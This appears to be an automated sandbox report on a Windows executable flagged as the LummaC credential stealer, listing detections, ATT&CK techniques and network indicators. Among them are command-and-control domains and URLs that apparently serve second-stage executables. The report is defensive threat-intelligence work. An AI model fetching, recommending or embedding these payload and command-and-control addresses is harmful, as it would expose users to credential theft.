                Source: Yara matchFile source: 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: fr2Mul3G6m.exe PID: 7248, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fr2Mul3G6m.exe PID: 7248, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		2
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services41
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		2
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                fr2Mul3G6m.exe61%ReversingLabsWin32.Infostealer.Tinba
                fr2Mul3G6m.exe100%AviraTR/Crypt.TPM.Gen
                fr2Mul3G6m.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://observerfry.lat/ero0%Avira URL Cloudsafe
                https://observerfry.lat/d0%Avira URL Cloudsafe
                https://observerfry.lat/pi0%Avira URL Cloudsafe
                http://185.215.113.16/off/def.exentS0%Avira URL Cloudsafe
                https://observerfry.lat/F0%Avira URL Cloudsafe
                https://observerfry.lat/es0%Avira URL Cloudsafe
                https://observerfry.lat/U0%Avira URL Cloudsafe
                https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
                https://observerfry.lat/r70%Avira URL Cloudsafe
                observerfry.lat0%Avira URL Cloudsafe
                https://observerfry.lat/0%Avira URL Cloudsafe
                https://observerfry.lat/x0%Avira URL Cloudsafe
                https://observerfry.lat/apial0%Avira URL Cloudsafe
                https://dz8aopenkvv6s.cloudfront.net0%Avira URL Cloudsafe
                https://observerfry.lat/apiit0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		3.5.25.145
                		truefalse
                  		high
                  bitbucket.org
                  		185.166.143.49
                  		truefalse
                    		high
                    observerfry.lat
                    		104.21.36.201
                    		truefalse
                      		high
                      bbuseruploads.s3.amazonaws.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        slipperyloo.latfalse
                          		high
                          curverpluch.latfalse
                            		high
                            tentabatte.latfalse
                              		high
                              manyrestro.latfalse
                                		high
                                bashfulacid.latfalse
                                  		high
                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                    		high
                                    observerfry.lattrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    wordyfindy.latfalse
                                      		high
                                      https://observerfry.lat/apifalse
                                        		high
                                        shapestickyr.latfalse
                                          		high
                                          talkynicer.latfalse
                                            		high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://duckduckgo.com/chrome_newtabfr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://observerfry.lat/erofr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://observerfry.lat/pifr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Prfr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netfr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://observerfry.lat/dfr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://bitbucket.org/nfr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614413727.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037907014.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpgfr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://observerfry.lat/r7fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456551411.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510348815.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://observerfry.lat/Ffr2Mul3G6m.exe, 00000005.00000003.1428862536.0000000000BCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://remote-app-switcher.prod-east.frontend.public.atl-paas.netfr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://x1.c.lencr.org/0fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0fr2Mul3G6m.exe, 00000005.00000002.2037494463.00000000008FA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYifr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://observerfry.lat/Ufr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://aui-cdn.atlassian.com/fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctafr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/products/firefoxgro.allfr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://185.215.113.16/off/def.exentSfr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://bitbucket.org/fr2Mul3G6m.exe, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614413727.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037907014.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://observerfry.lat/esfr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456551411.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netfr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icofr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://web-security-reports.services.atlassian.com/csp-report/bb-websitefr2Mul3G6m.exe, 00000005.00000003.1614711892.0000000005347000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2039826381.0000000005348000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://upx.sf.netAmcache.hve.10.drfalse
                                                                                                  		high
                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64fr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://observerfry.lat/fr2Mul3G6m.exe, fr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1452413726.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1346689010.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1346689010.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B49000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456874953.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1401425520.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1428862536.0000000000BCA000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510232310.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1457495731.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1399750303.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037927496.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431626589.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://ocsp.rootca1.amazontrust.com0:fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorfr2Mul3G6m.exe, 00000005.00000002.2040229853.00000000058E9000.00000002.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614005778.00000000053F0000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614066380.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfr2Mul3G6m.exe, 00000005.00000003.1402887479.000000000545A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://dz8aopenkvv6s.cloudfront.netfr2Mul3G6m.exe, 00000005.00000003.1614711892.0000000005347000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2039826381.0000000005348000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614183822.0000000005333000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://ac.ecosia.org/autocomplete?q=fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeFfr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.microfr2Mul3G6m.exe, 00000005.00000003.1452299566.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1431528606.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1343341041.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1456632127.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1432099705.0000000000B55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfr2Mul3G6m.exe, 00000005.00000003.1403621758.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netfr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://observerfry.lat/apialfr2Mul3G6m.exe, 00000005.00000003.1452213019.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://observerfry.lat/apiitfr2Mul3G6m.exe, 00000005.00000003.1429087929.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://cdn.cookielaw.org/fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?fr2Mul3G6m.exe, 00000005.00000003.1400681191.000000000536E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;fr2Mul3G6m.exe, 00000005.00000003.1614493196.0000000000BA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netfr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://185.215.113.16/off/def.exefr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://observerfry.lat/xfr2Mul3G6m.exe, 00000005.00000003.1614286324.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1509909217.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1510348815.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000002.2037927496.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1614352780.0000000000BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fr2Mul3G6m.exe, 00000005.00000003.1347753650.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347846205.0000000005369000.00000004.00000800.00020000.00000000.sdmp, fr2Mul3G6m.exe, 00000005.00000003.1347693011.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://bbuseruploads.s3.amazonaws.com/fr2Mul3G6m.exe, 00000005.00000002.2037623366.0000000000B47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    3.5.25.145
                                                                                                                                    		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                    185.166.143.49
                                                                                                                                    		bitbucket.orgGermany
                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                    104.21.36.201
                                                                                                                                    		observerfry.latUnited States
                                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                    Analysis ID:1579972
                                                                                                                                    Start date and time:2024-12-23 17:19:25 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 6m 2s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:15
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:fr2Mul3G6m.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:5bb8a1264df6a69e4b6118482039c003.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@3/3
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                    Warnings

                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 4.175.87.197, 20.190.147.8
                                                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                    • VT rate limit hit for: fr2Mul3G6m.exe

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    11:20:20API Interceptor31x Sleep call for process: fr2Mul3G6m.exe modified
                                                                                                                                    11:21:27API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • jasonj002.bitbucket.io/
                                                                                                                                    104.21.36.201zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        ABnDy7rLFS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                          skIYOAOzvU.exeGet hashmaliciousLummaCBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            observerfry.latt8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.199.72
                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.36.201
                                                                                                                                            0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 172.67.199.72
                                                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.36.201
                                                                                                                                            NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 172.67.199.72
